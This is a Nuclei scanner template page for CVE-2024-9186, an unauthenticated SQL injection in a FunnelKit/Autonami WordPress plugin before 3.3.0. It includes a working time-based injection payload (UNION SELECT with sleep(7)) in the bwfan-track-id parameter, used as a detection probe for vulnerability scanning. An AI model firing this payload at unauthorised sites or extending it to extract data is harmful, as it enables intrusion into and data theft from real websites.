Skip to content
Nuclei Templates

Automation By Autonami < 3.3.0 - SQL Injection

ID: CVE-2024-9186

Severity: high

Author: s4e-io

Tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli

Description

Section titled “Description”

The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2024-9186


info:
  name: Automation By Autonami < 3.3.0 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id  parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.
  remediation: Fixed in 3.3.0
  reference:
    - https://wpscan.com/vulnerability/fab29b59-7e87-4289-88dd-ed5520260c26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9186
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-89
    cve-id: CVE-2024-9186
    epss-score: 0.00043
    epss-percentile: 0.10302
  metadata:
    verified: true
    max-request: 2
    vendor: funnelkit
    product: wp-marketing-automations
    framework: wordpress
    fofa-query: body="wp-content/plugins/wp-marketing-automations/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-marketing-automations")'
          - "status_code == 200"
        condition: and
        internal: true


  - raw:
      - |
        @timeout 20s
        GET /?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(7)%23&bwfan-track-action=click HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220475af798deeb18979653559082a1833688358628fb5fcb49c4909d3c434d4019022100853234487a9e8836dc2b71cd3c06a7df47a4cef50347835954a7f96b8ef2b5e2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9186.yaml"

View on Github